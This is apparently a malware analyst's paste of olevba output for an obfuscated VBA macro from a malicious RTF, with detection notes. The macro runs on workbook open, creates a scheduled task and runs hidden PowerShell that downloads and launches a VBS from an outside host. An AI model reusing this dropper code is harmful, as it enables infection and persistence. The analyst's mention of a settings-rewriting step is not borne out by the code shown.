dissectmalware

Malicious VBA macros

Apr 5th, 2018
  1. ' macro extracted from a malicious rtf file (Do not open/run on a production machine):
  2. ' https://www.hybrid-analysis.com/sample/2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7?environmentId=100
  3. ' Analysis: https://twitter.com/DissectMalware/status/981766295774531586
  4.  
  5. olevba 0.52 - http://decalage.info/python/oletools
  6. Flags        Filename                                                        
  7. -----------  -----------------------------------------------------------------
  8. OpX:MASIH--- C:\Users\user\Downloads\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin_object_000A25F5\Package
  9. ===============================================================================
  10. FILE: C:\Users\user\Downloads\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin_object_000A25F5\Package
  11. Type: OpenXML
  12. -------------------------------------------------------------------------------
  13. VBA MACRO ThisWorkbook.cls
  14. in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
  15. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  16. Private Sub Workbook_Open()
      ' ANALYST NOTE: Workbook_Open is the Excel event procedure that fires when the
      ' workbook is opened with macros enabled. This body does three things:
      '   1. registers a scheduled task whose action downloads and runs a VBS file,
      '   2. runs a second download-and-start directly through PowerShell,
      '   3. rewrites per-user Office macro and Protected View settings.
      ' The command strings are concatenated one or a few characters at a time, so
      ' the full commands never appear as literals in the macro source; static string
      ' matching has to work on the reassembled value or on process behaviour.
  17. Set ASdiW834hkjasdDk8 = CreateObject("WScript.Shell")
  18.    Dim ASdiW83ASdjSn1
  19.    Dim ASdiW83ASdjSn2
  20.    Dim ASdiW83ASdjSn3
  21.    Dim ASdiW83ASdjSn4
  22.    Dim ASdiW83ASdjSn5
  23.    Dim ASdiW83ASdjSn6
  24.    Dim ASdiW83ASdjSn7
  25.    
  26.     ASdiW83ASdjSn1 = "S"
  27.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "c"
  28.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "h"
  29.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "T"
  30.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "a"
  31.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s"
  32.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "k"
  33.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s /"
  34.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "C"
  35.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "r"
  36.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "e"
  37.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "a"
  38.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "t"
  39.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "e /"
  40.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s"
  41.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "c M"
  42.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "I"
  43.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "N"
  44.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "U"
  45.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "T"
  46.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "E /"
  47.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "M"
  48.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "O 1 /T"
  49.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "N W"
  50.     ASdiW83ASdjSn2 = "i"
  51.     ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "n"
  52.      ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  53.       ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "o"
  54.        ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "w"
  55.         ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "s"
  56.          ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "U"
  57.           ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "p"
  58.            ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  59.             ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "a"
  60.              ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "t"
  61.               ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e /"
  62.                ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "T"
  63.                 ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "R ""P"
  64.                  ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "o"
  65.                   ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "w"
  66.                    ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
  67.                     ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "r"
  68.                      ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "s"
  69.                       ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "h"
  70.                        ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
  71.                         ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "l"
  72.                          ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "l -W H"
  73.                           ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "i"
  74.                            ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  75.                             ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  76.                              ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
  77.                               ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "n ("
  78.     ASdiW83ASdjSn3 = "N"
  79.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  80.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "w"
  81.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "-"
  82.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "O"
  83.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "b"
  84.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "j"
  85.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  86.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "c"
  87.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t S"
  88.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "y"
  89.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "s"
  90.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t"
  91.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  92.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "m"
  93.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
  94.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "N"
  95.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "et"
  96.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
  97.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "W"
  98.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  99.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "b"
  100.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "C"
  101.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "l"
  102.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "i"
  103.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  104.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "n"
  105.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t"
  106.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & ")"
  107.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
  108.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "D"
  109.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "o"
  110.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "w"
  111.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "n"
  112.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "l"
  113.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "o"
  114.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "a"
  115.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "d"
  116.     ASdiW83ASdjSn4 = "F"
  117.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "i"
  118.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "l"
  119.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "e"
  120.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "("
  121.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
  122.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
  123.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\""http://onedrivenet.xyz/work/19.vbs\"
  124.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
  125.     ASdiW83ASdjSn5 = "\"",\"
  126.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  127.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\""$"
  128.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "e"
  129.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "n"
  130.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
  131.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & ":"
  132.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "p"
  133.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "u"
  134.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "b"
  135.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "l"
  136.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "i"
  137.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "c"
  138.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  139.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
  140.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
  141.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "c"
  142.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "h"
  143.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "o"
  144.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
  145.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "t"
  146.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "3"
  147.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "2"
  148.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "5"
  149.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "."
  150.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
  151.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "b"
  152.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
  153.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  154.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  155.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"")"
  156.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & ";"
  157.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "("
  158.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "N"
  159.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "e"
  160.     ASdiW83ASdjSn6 = "w"
  161.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "-"
  162.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "O"
  163.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "b"
  164.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "j"
  165.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  166.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  167.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t -"
  168.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  169.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "o"
  170.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "m S"
  171.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "h"
  172.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  173.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  174.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  175.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "."
  176.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "A"
  177.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "p"
  178.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "p"
  179.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  180.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "i"
  181.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  182.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "a"
  183.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t"
  184.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "i"
  185.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "o"
  186.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "n"
  187.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & ")"
  188.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "."
  189.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "S"
  190.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "h"
  191.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  192.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  193.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  194.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "E"
  195.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "x"
  196.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  197.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  198.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "u"
  199.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t"
  200.     ASdiW83ASdjSn7 = "e"
  201.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "("
  202.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  203.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  204.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\""$"
  205.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "e"
  206.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "n"
  207.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "v"
  208.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & ":"
  209.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "p"
  210.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "u"
  211.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "b"
  212.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "l"
  213.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "i"
  214.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "c"
  215.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  216.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "s"
  217.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "v"
  218.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "c"
  219.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "h"
  220.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "o"
  221.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "s"
  222.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "t"
  223.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "3"
  224.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "2"
  225.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "5"
  226.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "."
  227.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "vbs"
  228.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  229.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  230.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"");"" /"
  231.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "F "
  232.  
      ' The seven fragments are joined and passed to WScript.Shell.Run with vbHide, so
      ' the command runs without a visible window. The author's comment further down
      ' gives the reassembled value: SchTasks creates (/F, without prompting) a task
      ' named WindowsUpdate that fires every minute (/sc MINUTE /MO 1); the task action
      ' is a hidden PowerShell that saves hxxp://onedrivenet[.]xyz/work/19.vbs
      ' (defanged) as svchost325.vbs under $env:public and launches it via
      ' Shell.Application.ShellExecute.
      ' Detection: Excel spawning schtasks.exe, a task named WindowsUpdate whose
      ' action is PowerShell, and script files created in the Public profile folder.
  233. ASdiW83ASdjSn200 = ASdiW83ASdjSn1 + ASdiW83ASdjSn2 + ASdiW83ASdjSn3 + ASdiW83ASdjSn4 + ASdiW83ASdjSn5 + ASdiW83ASdjSn6 + ASdiW83ASdjSn7
  234.  
  235.  
  236.  
  237. ASdiW834hkjasdDk8.Run ASdiW83ASdjSn200, vbHide
  238.  
  239.  
  240. ' ASdiW83ASdjSn200 "SchTasks /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://onedrivenet.xyz/work/19.vbs\\\",\\\"$env:public\svchost325.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost325.vbs\\\");" /F "
  241.  
  242.  
  243.  
  244.  
  245.  
  246.  
      ' Second command, built the same way from fourteen fragments. Joined, it reads:
      '   PowerShell (New-Object System.Net.WebClient).DownloadFile(
      '     'hxxp://onedrivenet[.]xyz/work/19.vbs','%Public%\svchost32.vbs');
      '     Start-Process '%Public%\svchost32.vbs'          (URL defanged here)
      ' It fetches the same URL as the scheduled task but saves it under a different
      ' name (svchost32.vbs rather than svchost325.vbs) and starts it immediately,
      ' again with vbHide. Detection: Excel spawning powershell.exe with
      ' Net.WebClient/DownloadFile on the command line.
  247. Set FiNoa9L = CreateObject("WScript.Shell")
  248.    Dim FiNSincals3ASdoa9L1
  249.    Dim FiNSincals3ASdoa9L2
  250.    Dim FiNSincals3ASdoa9L3
  251.    Dim FiNSincals3ASdoa9L4
  252.    Dim FiNSincals3ASdoa9L5
  253.    Dim FiNSincals3ASdoa9L6
  254.    Dim FiNSincals3ASdoa9L7
  255.    Dim FiNSincals3ASdoa9L8
  256.    Dim FiNSincals3ASdoa9L9
  257.    Dim FiNSincals3ASdoa9L010
  258.    Dim FiNSincals3ASdoa9L011
  259.    Dim FiNSincals3ASdoa9L012
  260.    Dim FiNSincals3ASdoa9L013
  261.    Dim FiNSincals3ASdoa9L014
  262.  
  263.  
  264.    
  265. FiNSincals3ASdoa9L1 = "P"
  266. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "o"
  267. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "w"
  268. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "e"
  269. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "r"
  270. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "S"
  271. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "h"
  272. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "e"
  273. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "l"
  274. FiNSincals3ASdoa9L2 = "l"
  275. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & " ("
  276. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "N"
  277. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "e"
  278. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "w"
  279. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "-"
  280. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "O"
  281. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "b"
  282. FiNSincals3ASdoa9L3 = "j"
  283. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "e"
  284. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "c"
  285. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "t "
  286. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "S"
  287. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "y"
  288. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "s"
  289. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "t"
  290. FiNSincals3ASdoa9L4 = "e"
  291. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "m"
  292. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "."
  293. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "N"
  294. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "e"
  295. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "t"
  296. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "."
  297. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "W"
  298. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "e"
  299. FiNSincals3ASdoa9L5 = "b"
  300. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "C"
  301. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "l"
  302. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "i"
  303. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "e"
  304. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "n"
  305. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "t"
  306. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & ")"
  307. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "."
  308. FiNSincals3ASdoa9L6 = "D"
  309. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "o"
  310. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "w"
  311. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "n"
  312. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "l"
  313. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "o"
  314. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "a"
  315. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "d"
  316. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "F"
  317. FiNSincals3ASdoa9L7 = "i"
  318. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "l"
  319. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "e"
  320. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "("
  321. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "'http://onedrivenet.xyz/work/19.vbs',"
  322. FiNSincals3ASdoa9L8 = "'"
  323. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "%"
  324. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "P"
  325. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "u"
  326. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "b"
  327. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "lic"
  328. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "%"
  329. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "\"
  330. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "s"
  331. FiNSincals3ASdoa9L9 = "v"
  332. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "c"
  333. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "h"
  334. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "o"
  335. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "s"
  336. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "t"
  337. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "3"
  338. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "2"
  339. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "."
  340. FiNSincals3ASdoa9L010 = "v"
  341. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "b"
  342. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "s"
  343. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "'"
  344. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & ")"
  345. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & ";"
  346. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "S"
  347. FiNSincals3ASdoa9L011 = "t"
  348. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "a"
  349. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "r"
  350. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "t"
  351. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "-"
  352. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "P"
  353. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "r"
  354. FiNSincals3ASdoa9L012 = "o"
  355. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "c"
  356. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "e"
  357. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "s"
  358. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "s"
  359. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & " '"
  360. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "%"
  361. FiNSincals3ASdoa9L013 = "P"
  362. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "u"
  363. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "b"
  364. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "lic"
  365. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "%"
  366. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "\"
  367. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "s"
  368. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "v"
  369. FiNSincals3ASdoa9L014 = "c"
  370. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "h"
  371. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "o"
  372. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "s"
  373. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "t"
  374. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "3"
  375. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "2"
  376. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "."
  377. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "v"
  378. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "b"
  379. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "s"
  380. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "'"
  381.  
  382.  
  383.    
  384. FiNSincals3ASdoa9L20 = FiNSincals3ASdoa9L1 + FiNSincals3ASdoa9L2 + FiNSincals3ASdoa9L3 + FiNSincals3ASdoa9L4 + FiNSincals3ASdoa9L5 + FiNSincals3ASdoa9L6 + FiNSincals3ASdoa9L7 + FiNSincals3ASdoa9L8 + FiNSincals3ASdoa9L9 + FiNSincals3ASdoa9L010 + FiNSincals3ASdoa9L011 + FiNSincals3ASdoa9L012 + FiNSincals3ASdoa9L013 + FiNSincals3ASdoa9L014
  385.     FiNoa9L.Run FiNSincals3ASdoa9L20, vbHide
